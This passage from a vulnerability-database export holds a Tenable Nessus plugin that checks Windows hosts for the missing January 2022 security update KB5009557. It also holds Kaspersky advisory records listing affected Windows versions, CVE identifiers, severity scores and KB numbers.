"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21839", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009557.NASL", "href": "https://www.tenable.com/plugins/nessus/156621", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc. \n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156621);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21839\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21912\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009557\");\n script_xref(name:\"MSFT\", value:\"MS22-5009557\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009557: Windows 10 Version 1809 and Windows Server 2019 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009557.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21839,\n CVE-2022-21843, CVE-2022-21847, CVE-2022-21848,\n CVE-2022-21883, CVE-2022-21889, CVE-2022-21890,\n CVE-2022-21918)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21877,\n CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21888, CVE-2022-21892,\n CVE-2022-21893, CVE-2022-21898, CVE-2022-21907,\n CVE-2022-21912, CVE-2022-21922, CVE-2022-21928,\n CVE-2022-21958, CVE-2022-21959, CVE-2022-21960,\n CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21852, CVE-2022-21857,\n CVE-2022-21858, CVE-2022-21859, CVE-2022-21860,\n CVE-2022-21861, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21865, CVE-2022-21866,\n CVE-2022-21867, CVE-2022-21868, CVE-2022-21869,\n CVE-2022-21870, CVE-2022-21871, CVE-2022-21872,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21882, CVE-2022-21884,\n CVE-2022-21885, CVE-2022-21895, CVE-2022-21896,\n CVE-2022-21897, CVE-2022-21901, CVE-2022-21902,\n CVE-2022-21903, CVE-2022-21908, CVE-2022-21910,\n CVE-2022-21914, CVE-2022-21916, CVE-2022-21919,\n CVE-2022-21920)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21906, CVE-2022-21913, CVE-2022-21924,\n CVE-2022-21925)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009557\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009557.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009557');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'17763',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009557])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-03-22T08:33:52", "description": "### *Detect date*:\n02/09/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to cause denial of service, gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2019 \nWindows RT 8.1 \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server, version 1909 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-24080](<https://nvd.nist.gov/vuln/detail/CVE-2021-24080>) \n[CVE-2021-24103](<https://nvd.nist.gov/vuln/detail/CVE-2021-24103>) \n[CVE-2021-24093](<https://nvd.nist.gov/vuln/detail/CVE-2021-24093>) \n[CVE-2021-1734](<https://nvd.nist.gov/vuln/detail/CVE-2021-1734>) \n[CVE-2021-25195](<https://nvd.nist.gov/vuln/detail/CVE-2021-25195>) \n[CVE-2021-24086](<https://nvd.nist.gov/vuln/detail/CVE-2021-24086>) \n[CVE-2021-1727](<https://nvd.nist.gov/vuln/detail/CVE-2021-1727>) \n[CVE-2021-24102](<https://nvd.nist.gov/vuln/detail/CVE-2021-24102>) \n[CVE-2021-24094](<https://nvd.nist.gov/vuln/detail/CVE-2021-24094>) \n[CVE-2021-24076](<https://nvd.nist.gov/vuln/detail/CVE-2021-24076>) \n[CVE-2021-24078](<https://nvd.nist.gov/vuln/detail/CVE-2021-24078>) \n[CVE-2021-24084](<https://nvd.nist.gov/vuln/detail/CVE-2021-24084>) \n[CVE-2021-24075](<https://nvd.nist.gov/vuln/detail/CVE-2021-24075>) \n[CVE-2021-24082](<https://nvd.nist.gov/vuln/detail/CVE-2021-24082>) \n[CVE-2021-1731](<https://nvd.nist.gov/vuln/detail/CVE-2021-1731>) \n[CVE-2021-24083](<https://nvd.nist.gov/vuln/detail/CVE-2021-24083>) \n[CVE-2021-24079](<https://nvd.nist.gov/vuln/detail/CVE-2021-24079>) \n[CVE-2021-24096](<https://nvd.nist.gov/vuln/detail/CVE-2021-24096>) \n[CVE-2021-1722](<https://nvd.nist.gov/vuln/detail/CVE-2021-1722>) \n[CVE-2021-24098](<https://nvd.nist.gov/vuln/detail/CVE-2021-24098>) \n[CVE-2021-24074](<https://nvd.nist.gov/vuln/detail/CVE-2021-24074>) \n[CVE-2021-24088](<https://nvd.nist.gov/vuln/detail/CVE-2021-24088>) \n[CVE-2021-24081](<https://nvd.nist.gov/vuln/detail/CVE-2021-24081>) \n[CVE-2021-24077](<https://nvd.nist.gov/vuln/detail/CVE-2021-24077>) \n[CVE-2021-1698](<https://nvd.nist.gov/vuln/detail/CVE-2021-1698>) \n[CVE-2021-24106](<https://nvd.nist.gov/vuln/detail/CVE-2021-24106>) \n[CVE-2021-1732](<https://nvd.nist.gov/vuln/detail/CVE-2021-1732>) \n[CVE-2021-24091](<https://nvd.nist.gov/vuln/detail/CVE-2021-24091>) \n[CVE-2020-17162](<https://nvd.nist.gov/vuln/detail/CVE-2020-17162>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-24080](<https://vulners.com/cve/CVE-2021-24080>)4.3Warning \n[CVE-2021-24103](<https://vulners.com/cve/CVE-2021-24103>)4.6Warning \n[CVE-2021-24093](<https://vulners.com/cve/CVE-2021-24093>)6.8High \n[CVE-2021-1734](<https://vulners.com/cve/CVE-2021-1734>)5.0Critical \n[CVE-2021-25195](<https://vulners.com/cve/CVE-2021-25195>)4.6Warning \n[CVE-2021-24086](<https://vulners.com/cve/CVE-2021-24086>)5.0Critical \n[CVE-2021-1727](<https://vulners.com/cve/CVE-2021-1727>)4.6Warning \n[CVE-2021-24102](<https://vulners.com/cve/CVE-2021-24102>)4.6Warning \n[CVE-2021-24094](<https://vulners.com/cve/CVE-2021-24094>)7.5Critical \n[CVE-2021-24076](<https://vulners.com/cve/CVE-2021-24076>)2.1Warning \n[CVE-2021-24078](<https://vulners.com/cve/CVE-2021-24078>)7.5Critical \n[CVE-2021-24084](<https://vulners.com/cve/CVE-2021-24084>)4.9Warning \n[CVE-2021-24075](<https://vulners.com/cve/CVE-2021-24075>)3.5Warning \n[CVE-2021-24082](<https://vulners.com/cve/CVE-2021-24082>)4.0Warning \n[CVE-2021-1731](<https://vulners.com/cve/CVE-2021-1731>)2.1Warning \n[CVE-2021-24083](<https://vulners.com/cve/CVE-2021-24083>)6.8High \n[CVE-2021-24079](<https://vulners.com/cve/CVE-2021-24079>)2.1Warning \n[CVE-2021-24096](<https://vulners.com/cve/CVE-2021-24096>)4.6Warning \n[CVE-2021-1722](<https://vulners.com/cve/CVE-2021-1722>)7.5Critical \n[CVE-2021-24098](<https://vulners.com/cve/CVE-2021-24098>)2.1Warning \n[CVE-2021-24074](<https://vulners.com/cve/CVE-2021-24074>)7.5Critical \n[CVE-2021-24088](<https://vulners.com/cve/CVE-2021-24088>)6.5High \n[CVE-2021-24081](<https://vulners.com/cve/CVE-2021-24081>)6.8High \n[CVE-2021-24077](<https://vulners.com/cve/CVE-2021-24077>)7.5Critical \n[CVE-2021-1698](<https://vulners.com/cve/CVE-2021-1698>)4.6Warning \n[CVE-2021-24106](<https://vulners.com/cve/CVE-2021-24106>)2.1Warning \n[CVE-2021-1732](<https://vulners.com/cve/CVE-2021-1732>)4.6Warning \n[CVE-2021-24091](<https://vulners.com/cve/CVE-2021-24091>)6.8High \n[CVE-2020-17162](<https://vulners.com/cve/CVE-2020-17162>)6.5High\n\n### *KB list*:\n[4577048](<http://support.microsoft.com/kb/4577048>) \n[4571756](<http://support.microsoft.com/kb/4571756>) \n[4570333](<http://support.microsoft.com/kb/4570333>) \n[4577032](<http://support.microsoft.com/kb/4577032>) \n[4577049](<http://support.microsoft.com/kb/4577049>) \n[4577015](<http://support.microsoft.com/kb/4577015>) \n[4577066](<http://support.microsoft.com/kb/4577066>) \n[4574727](<http://support.microsoft.com/kb/4574727>) \n[4577071](<http://support.microsoft.com/kb/4577071>) \n[4577038](<http://support.microsoft.com/kb/4577038>) \n[4601354](<http://support.microsoft.com/kb/4601354>) \n[4601319](<http://support.microsoft.com/kb/4601319>) \n[4601315](<http://support.microsoft.com/kb/4601315>) \n[4601345](<http://support.microsoft.com/kb/4601345>) \n[4601357](<http://support.microsoft.com/kb/4601357>) \n[4601348](<http://support.microsoft.com/kb/4601348>) \n[4601318](<http://support.microsoft.com/kb/4601318>) \n[4601384](<http://support.microsoft.com/kb/4601384>) \n[4601349](<http://support.microsoft.com/kb/4601349>) \n[4601331](<http://support.microsoft.com/kb/4601331>) \n[5008218](<http://support.microsoft.com/kb/5008218>) \n[5008206](<http://support.microsoft.com/kb/5008206>) \n[5008212](<http://support.microsoft.com/kb/5008212>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "kaspersky", "title": "KLA12071 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17162", "CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2023-03-21T00:00:00", "id": "KLA12071", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12071/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T15:41:45", "description": "### *Detect date*:\n01/11/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions, cause denial of service, spoof user interface.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2022 \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2022 (Server Core installation) \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2016 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2016 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 21H2 for 32-bit Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-21860](<https://nvd.nist.gov/vuln/detail/CVE-2022-21860>) \n[CVE-2022-21959](<https://nvd.nist.gov/vuln/detail/CVE-2022-21959>) \n[CVE-2022-21852](<https://nvd.nist.gov/vuln/detail/CVE-2022-21852>) \n[CVE-2022-21859](<https://nvd.nist.gov/vuln/detail/CVE-2022-21859>) \n[CVE-2022-21915](<https://nvd.nist.gov/vuln/detail/CVE-2022-21915>) \n[CVE-2022-21875](<https://nvd.nist.gov/vuln/detail/CVE-2022-21875>) \n[CVE-2022-21908](<https://nvd.nist.gov/vuln/detail/CVE-2022-21908>) \n[CVE-2021-36976](<https://nvd.nist.gov/vuln/detail/CVE-2021-36976>) \n[CVE-2022-21834](<https://nvd.nist.gov/vuln/detail/CVE-2022-21834>) \n[CVE-2022-21864](<https://nvd.nist.gov/vuln/detail/CVE-2022-21864>) \n[CVE-2022-21910](<https://nvd.nist.gov/vuln/detail/CVE-2022-21910>) \n[CVE-2022-21898](<https://nvd.nist.gov/vuln/detail/CVE-2022-21898>) \n[CVE-2022-21922](<https://nvd.nist.gov/vuln/detail/CVE-2022-21922>) \n[CVE-2022-21881](<https://nvd.nist.gov/vuln/detail/CVE-2022-21881>) \n[CVE-2022-21838](<https://nvd.nist.gov/vuln/detail/CVE-2022-21838>) \n[CVE-2022-21867](<https://nvd.nist.gov/vuln/detail/CVE-2022-21867>) \n[CVE-2022-21901](<https://nvd.nist.gov/vuln/detail/CVE-2022-21901>) \n[CVE-2022-21865](<https://nvd.nist.gov/vuln/detail/CVE-2022-21865>) \n[CVE-2022-21850](<https://nvd.nist.gov/vuln/detail/CVE-2022-21850>) \n[CVE-2022-21870](<https://nvd.nist.gov/vuln/detail/CVE-2022-21870>) \n[CVE-2022-21912](<https://nvd.nist.gov/vuln/detail/CVE-2022-21912>) \n[CVE-2022-21913](<https://nvd.nist.gov/vuln/detail/CVE-2022-21913>) \n[CVE-2022-21894](<https://nvd.nist.gov/vuln/detail/CVE-2022-21894>) \n[CVE-2022-21960](<https://nvd.nist.gov/vuln/detail/CVE-2022-21960>) \n[CVE-2022-21879](<https://nvd.nist.gov/vuln/detail/CVE-2022-21879>) \n[CVE-2022-21835](<https://nvd.nist.gov/vuln/detail/CVE-2022-21835>) \n[CVE-2022-21903](<https://nvd.nist.gov/vuln/detail/CVE-2022-21903>) \n[CVE-2022-21964](<https://nvd.nist.gov/vuln/detail/CVE-2022-21964>) \n[CVE-2022-21907](<https://nvd.nist.gov/vuln/detail/CVE-2022-21907>) \n[CVE-2022-21889](<https://nvd.nist.gov/vuln/detail/CVE-2022-21889>) \n[CVE-2022-21866](<https://nvd.nist.gov/vuln/detail/CVE-2022-21866>) \n[CVE-2021-22947](<https://nvd.nist.gov/vuln/detail/CVE-2021-22947>) \n[CVE-2022-21919](<https://nvd.nist.gov/vuln/detail/CVE-2022-21919>) \n[CVE-2022-21851](<https://nvd.nist.gov/vuln/detail/CVE-2022-21851>) \n[CVE-2022-21920](<https://nvd.nist.gov/vuln/detail/CVE-2022-21920>) \n[CVE-2022-21888](<https://nvd.nist.gov/vuln/detail/CVE-2022-21888>) \n[CVE-2022-21868](<https://nvd.nist.gov/vuln/detail/CVE-2022-21868>) \n[CVE-2022-21963](<https://nvd.nist.gov/vuln/detail/CVE-2022-21963>) \n[CVE-2022-21958](<https://nvd.nist.gov/vuln/detail/CVE-2022-21958>) \n[CVE-2022-21928](<https://nvd.nist.gov/vuln/detail/CVE-2022-21928>) \n[CVE-2022-21924](<https://nvd.nist.gov/vuln/detail/CVE-2022-21924>) \n[CVE-2022-21905](<https://nvd.nist.gov/vuln/detail/CVE-2022-21905>) \n[CVE-2022-21836](<https://nvd.nist.gov/vuln/detail/CVE-2022-21836>) \n[CVE-2022-21839](<https://nvd.nist.gov/vuln/detail/CVE-2022-21839>) \n[CVE-2022-21918](<https://nvd.nist.gov/vuln/detail/CVE-2022-21918>) \n[CVE-2022-21900](<https://nvd.nist.gov/vuln/detail/CVE-2022-21900>) \n[CVE-2022-21880](<https://nvd.nist.gov/vuln/detail/CVE-2022-21880>) \n[CVE-2022-21883](<https://nvd.nist.gov/vuln/detail/CVE-2022-21883>) \n[CVE-2022-21882](<https://nvd.nist.gov/vuln/detail/CVE-2022-21882>) \n[CVE-2022-21902](<https://nvd.nist.gov/vuln/detail/CVE-2022-21902>) \n[CVE-2022-21833](<https://nvd.nist.gov/vuln/detail/CVE-2022-21833>) \n[CVE-2022-21877](<https://nvd.nist.gov/vuln/detail/CVE-2022-21877>) \n[CVE-2022-21871](<https://nvd.nist.gov/vuln/detail/CVE-2022-21871>) \n[CVE-2022-21874](<https://nvd.nist.gov/vuln/detail/CVE-2022-21874>) \n[CVE-2022-21890](<https://nvd.nist.gov/vuln/detail/CVE-2022-21890>) 